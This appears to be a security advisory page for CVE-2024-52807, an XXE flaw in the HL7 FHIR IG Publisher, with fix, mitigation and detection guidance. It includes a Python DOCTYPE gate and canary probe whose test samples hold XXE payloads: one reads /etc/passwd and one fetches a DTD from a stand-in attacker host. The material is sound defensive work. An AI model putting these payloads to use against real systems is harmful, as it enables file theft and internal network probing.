CVE-2024-52807
📋 TL;DR
This CVE describes an XML External Entity (XXE) vulnerability in the HL7 FHIR IG Publisher tool in versions before 1.7.4. XSLT transforms performed by several of the tool's components resolve external entities, so an XML document carrying a DTD with a SYSTEM entity (for example one pointing at a local file) can cause the transform output to include data from the host that runs the publisher. The exposure is greatest where the publisher processes XML supplied by external or untrusted clients; builds that only process XML authored by the IG team are much less exposed.
💻 Affected Systems
- HL7 FHIR IG Publisher
⚠️ Manual Verification Required
Our database has no machine-readable version range for this CVE, so automatic detection cannot tell whether your installation is affected.
Why? The NVD entry does not carry vendor-supplied version ranges. The vendor advisory itself states that versions before 1.7.4 are affected, so treat the version check in the How to Verify section as authoritative.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Update to 1.7.4 or later; if that is not possible immediately, apply the measures under "If You Can't Patch"
⚠️ Risk & Real-World Impact
Worst Case
Arbitrary file read on the host running the publisher (credentials, private keys, configuration and environment files readable by the publisher's account) and, via http:// entities, requests to internal services reachable from that host. Either can seed credential theft and lateral movement. XXE on its own does not give code execution; "complete compromise" would require chaining the disclosed material with another weakness.
Likely Case
Disclosure of files readable by the account running the publisher, surfaced inside the generated output, typically configuration files, credentials or other sensitive data.
If Mitigated
Little to no impact when XML from untrusted sources is rejected before processing (no DOCTYPE accepted) and the publisher runs in an isolated, low-privilege environment that holds no secrets and cannot reach internal services.
🎯 Exploit Status
Exploitation requires the ability to get an XML document processed by the tool's XSLT transforms. The payload is a standard DOCTYPE with a SYSTEM entity, so no special tooling is needed. The advisory notes that an earlier fix for this issue was incomplete; confirm that the installed version is 1.7.4 or later rather than assuming any post-disclosure release is safe.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.7.4
Vendor Advisory: https://github.com/HL7/fhir-ig-publisher/security/advisories/GHSA-8c3x-hq82-gjcm
Restart Required: No
Instructions:
1. Download version 1.7.4 or later from the official repository.
2. Replace the existing installation with the updated version.
3. Confirm that the running version reports 1.7.4 or later. An earlier fix for this issue was incomplete, so an intermediate release is not sufficient, and then re-run the canary test described under "Verify Fix Applied".
🔧 Temporary Workarounds
No workarounds available
The vendor advisory states that no known workarounds exist. Previous attempts to fix this were incomplete, so an intermediate release should not be relied on as a workaround either.
🧯 If You Can't Patch
- Isolate the FHIR IG Publisher host from untrusted networks and accept XML only from trusted sources.
- Reject any submitted XML that contains a DOCTYPE declaration before it reaches the tool. An external entity can only be declared inside a DTD, so refusing every DOCTYPE blocks the attack outright and avoids the fragile approach of trying to sanitize entity references.
- Run the publisher under a dedicated low-privilege account in a working directory that holds no secrets, and restrict outbound HTTP from that host to the services the publisher actually needs. This limits what a successful XXE can read or reach.
🔍 How to Verify
Check if Vulnerable:
Check the installed version of org.hl7.fhir.publisher. Any version below 1.7.4 contains the flaw; it is exploitable whenever the tool processes XML from untrusted sources.
Check Version:
Check the publisher version in the tool's output or configuration files, or run: java -jar fhir-publisher.jar --version
Verify Fix Applied:
After upgrading to 1.7.4 or later, on a non-production host, run the publisher over a test document whose DTD declares an external entity pointing at a local canary file containing a random token, and confirm that the token does not appear anywhere in the generated output. Run the same probe against the old version first so you know it actually exercises the vulnerable path.
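Both the DOCTYPE gate suggested under "If You Can't Patch" and the canary probe described in the verification step above are small enough to script. The block below is an added example, not code from the HL7 FHIR IG Publisher project: the gate uses expat's own DOCTYPE and entity callbacks instead of a substring search (so a "<!DOCTYPE" inside a comment is not a false positive and an encoding trick cannot hide a real one), and the probe functions build the test document and check the publisher's output for the canary token. The sample documents are constructed; the file path in the probe is whatever you pass in.

```python
"""XXE pre-parse gate and canary probe for XML handed to the IG Publisher.

Added example, not code from the HL7 FHIR IG Publisher project. Uses only the
Python standard library; the sample documents below are constructed.
"""
import os
import secrets
import xml.parsers.expat as expat


class DtdFound(Exception):
    """Raised from an expat callback the moment a DOCTYPE or entity appears."""


def classify_xml(data: bytes) -> str:
    """Classify an XML document before it reaches any XSLT processing.

    Returns "ok"        - well-formed, no DOCTYPE and no entity declarations
            "dtd"       - carries a DOCTYPE or an <!ENTITY ...> declaration
            "malformed" - expat could not parse it

    External entities can only be declared inside a DOCTYPE, so refusing
    every DOCTYPE closes the XXE channel no matter how the downstream XSLT
    engine is configured.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdFound(f"DOCTYPE {name!r} (system id {sysid!r})")

    def on_entity(*_args):
        raise DtdFound("entity declaration")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except DtdFound:
        return "dtd"
    except expat.ExpatError:
        return "malformed"
    return "ok"


# --- canary probe for the "Verify Fix Applied" step -------------------------

def write_canary(directory: str) -> tuple[str, str]:
    """Write a canary file holding a random token; returns (path, token)."""
    token = "XXE-CANARY-" + secrets.token_hex(8)
    path = os.path.join(directory, "xxe_canary.txt")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(token)
    return path, token


def build_probe_document(canary_path: str) -> str:
    """Test input: a DTD declaring an external entity that points at the
    canary file, referenced from the body. Feed it to the publisher on a
    non-production host and then search the generated output."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE probe [<!ENTITY canary SYSTEM "file://{canary_path}">]>\n'
        '<probe>&canary;</probe>\n'
    )


def entity_was_expanded(publisher_output: str, token: str) -> bool:
    """True if the canary token leaked into the tool's output, i.e. the
    external entity was resolved and the installation is still vulnerable."""
    return token in publisher_output


# Constructed samples (not real FHIR content, not payloads from the advisory)
BENIGN = (b'<?xml version="1.0"?>'
          b'<Patient xmlns="http://hl7.org/fhir"><id value="example"/></Patient>')
FILE_XXE = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<Patient><id value="&xxe;"/></Patient>')
PARAM_XXE = (b'<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker.invalid/x.dtd"> %ext;]>'
             b'<foo/>')
COMMENT_ONLY = b'<root><!-- <!DOCTYPE looks scary but is just text> --></root>'
MALFORMED = b'<Patient><id value="1"></Patient>'

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("file xxe", FILE_XXE),
                       ("param xxe", PARAM_XXE), ("comment", COMMENT_ONLY),
                       ("malformed", MALFORMED)]:
        print(f"{label:10s} -> {classify_xml(doc)}")
```

Put classify_xml in front of whatever accepts XML from clients and drop anything that is not "ok"; FHIR resources never need a DTD, so the strict rule costs nothing. The gate only covers XML you hand in directly; the probe is still needed because the publisher may also transform XML it fetches or generates itself.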
📡 Detection & Monitoring
Log Indicators:
- File reads by the publisher process outside its working directory and the JVM install, in particular /etc/passwd, shadow files, key material or environment files. The publisher legitimately reads many files, so scope the rule to paths it has no reason to touch.
- Failed attempts to resolve external entities in XML processing logs
- Input XML containing a DOCTYPE or <!ENTITY ...> declaration. FHIR resources do not use a DTD, so any DOCTYPE in submitted XML is worth alerting on; file size is not an indicator.
Network Indicators:
- External entity resolution attempts: HTTP/HTTPS requests from the publisher process to internal addresses, including link-local endpoints such as cloud metadata services
- Unusual outbound connections from the publisher tool
SIEM Query (pseudo-syntax; adapt field names to your platform):
process_name:"java" AND process_args:"fhir-publisher" AND ((event_type:"file_read" AND NOT file_path:<IG working directory or JVM paths>) OR network_destination_ip:<your internal CIDRs>)
As written without the path exclusion, the file_read clause fires on every resource the publisher reads during a normal build; exclude the build directory and the JVM install, and replace the placeholders with your own paths and address ranges.